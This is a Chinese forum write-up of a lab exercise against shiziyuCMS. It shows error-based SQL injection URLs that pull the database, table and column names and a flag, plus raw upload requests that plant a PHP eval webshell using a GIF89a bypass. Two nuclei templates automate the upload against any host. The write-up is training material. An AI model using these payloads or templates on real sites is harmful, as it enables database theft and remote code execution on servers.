在 ApiController.class.php处参数过滤存在不严谨,导致SQL注入漏洞。
爆数据库poc:
http://bwo330m4vx.lab.aqlab.cn/index.php?s=api/goods_detail&goods_id=1 and updatexml(1,concat(0x7e,database(),0x7e),1)
爆出数据库名称为shiziyu
爆表名poc:
http://bwo330m4vx.lab.aqlab.cn/index.php?s=api/goods_detail&goods_id=1 and updatexml(1,concat(0x7e,(select table_name from information_schema.tables where table_schema='test' limit 0,1),0x7e),1)
此处可以借用burp进行爆破或者借用sqlmap爆破。
爆出数据表有oscshop_access、oscshop_address、oscshop_admin、oscshop_apply、oscshop_apply_relship、oscshop_area、oscshop_bad_domain、oscshop_balance、oscshop_balance_order、oscshop_bargain_goods、oscshop_bargain_order、oscshop_bargain_order_detail
用户名密码大概率存在oscshop_admin表中,获取该表的列名。
爆列名poc:
http://bwo330m4vx.lab.aqlab.cn/index.php?s=api/goods_detail&goods_id=1 and updatexml(1,concat(0x7e,(select column_name from information_schema.columns where table_schema=database() and table_name='oscshop_admin' limit 0,1),0x7e),1)
爆出列名有a_uname、a_true_name、a_telephone、a_email a_passwd、a_is_super、a_role_id、a_login_count。
以为用户名和密码会存在a_uname和a_passwd字段中,发现尝试了一下一个都没有,无法登录后台。
经过魔方老师提醒,flag放在shiziyu_flag表中,那就获取一下。
http://bwo330m4vx.lab.aqlab.cn/index.php?s=api/goods_detail&goods_id=1 and updatexml(1,concat(0x7e,(select column_name from information_schema.columns where table_schema=database() and table_name='shiziyu_flag' limit 0,1),0x7e),1)
http://bwo330m4vx.lab.aqlab.cn/index.php?s=api/goods_detail&goods_id=1 and updatexml(1,concat(0x7e,(select flag from shiziyu_flag limit 0,1),0x7e),1)
发现只获取到了一半,这里需要借助right函数。
http://bwo330m4vx.lab.aqlab.cn/index.php?s=api/goods_detail&goods_id=1 and updatexml(1,concat(0x7e,(select right(flag,20) from shiziyu_flag limit 0,1),0x7e),1)
拼接一下即可。
漏洞存在地址:xxxx/Common/ckeditor/plugins/multiimg/dialogs/image_upload.php
抓包,构建数据如下。
POST /Common/ckeditor/plugins/multiimg/dialogs/image_upload.php HTTP/1.1
Host: bwo330m4vx.lab.aqlab.cn
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/119.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Cookie: PHPSESSID=qqd34djlksudfkaquf8s0qbaa6
Upgrade-Insecure-Requests: 1
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary8UaANmWAgM4BqBSs
Content-Length: 209
------WebKitFormBoundary8UaANmWAgM4BqBSs
Content-Disposition: form-data; name="files"; filename="test.php"
Content-Type: image/gif
<?php <span class="label label-primary">@eval($_REQUEST[8]);?</span>>
------WebKitFormBoundary8UaANmWAgM4BqBSs—
发包,查看回显。
给出文件上传位置,访问一下。记得要在上传路径前面拼接上Common才行。
执行一句话木马,获取flag。
漏洞存在地址:xxxx/wxapp.php?controller=Goods.doPageUpload
抓包,构建数据如下:
POST /wxapp.php?controller=Goods.doPageUpload HTTP/1.1
Host: bwo330m4vx.lab.aqlab.cn
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/119.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Cookie: PHPSESSID=qqd34djlksudfkaquf8s0qbaa6
Upgrade-Insecure-Requests: 1
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary8UaANmWAgM4BqBSs
Content-Length: 217
------WebKitFormBoundary8UaANmWAgM4BqBSs
Content-Disposition: form-data; name="upfile"; filename="Test.php"
Content-Type: image/gif
GIF89a
<?php @eval($_REQUEST[8]);?>
------WebKitFormBoundary8UaANmWAgM4BqBSs--
注意,这里对文件内容进行了过滤,所以此处添加了GIF89a魔术头,成功上传,获得文件地址。
访问一下,执行一句话木马,获取flag。
nuclei-poc:
id: shiziyuCMS
info:
name: shiziyuCMS-upload
author: xxxx
severity: info
description: description
reference:
- https://
tags: tags
requests:
- raw:
- |-
POST /Common/ckeditor/plugins/multiimg/dialogs/image_upload.php HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/119.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Cookie: PHPSESSID=qqd34djlksudfkaquf8s0qbaa6
Upgrade-Insecure-Requests: 1
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary8UaANmWAgM4BqBSs
Content-Length: 209
------WebKitFormBoundary8UaANmWAgM4BqBSs
Content-Disposition: form-data; name="files"; filename="test.php"
Content-Type: image/gif
<?php @eval($_REQUEST[8]);?>
------WebKitFormBoundary8UaANmWAgM4BqBSs—
matchers-condition: and
matchers:
- type: word
part: body
words:
- image/uploads/
- type: status
status:
- 200
nuclei验证
nuclei-poc:
id: shiziyuCMS
info:
name: shiziyuCMS-upload2
author: lvqiyun
severity: info
description: description
reference:
- https://
tags: tags
requests:
- raw:
- |-
POST /wxapp.php?controller=Goods.doPageUpload HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/119.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Cookie: PHPSESSID=qqd34djlksudfkaquf8s0qbaa6
Upgrade-Insecure-Requests: 1
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary8UaANmWAgM4BqBSs
Content-Length: 217
------WebKitFormBoundary8UaANmWAgM4BqBSs
Content-Disposition: form-data; name="upfile"; filename="Test.php"
Content-Type: image/gif
GIF89a
<?php @eval($_REQUEST[8]);?>
------WebKitFormBoundary8UaANmWAgM4BqBSs--
matchers-condition: and
matchers:
- type: word
part: body
words:
- Uploads\/image\/goods
- type: status
status:
- 200
nuclei验证
用户名 | 金币 | 积分 | 时间 | 理由 |
---|---|---|---|---|
Track-魔方 | 300.00 | 0 | 2023-10-31 20:08:06 | WP奖励 |
打赏我,让我更有动力~
© 2016 - 2024 掌控者 All Rights Reserved.
Track-魔方
发表于 2023-10-30
实际上数据库中有flag,在shiziyu_flag表中,手速真快
评论列表
加载数据中...
Track-魔方
发表于 2023-10-30
但,还有一处文件上传诺,需要进行绕过上传
评论列表
加载数据中...
Track-魔方
发表于 2023-10-31
【赞】
评论列表
加载数据中...
成风
发表于 8个月前
不错,挺详细的
评论列表
加载数据中...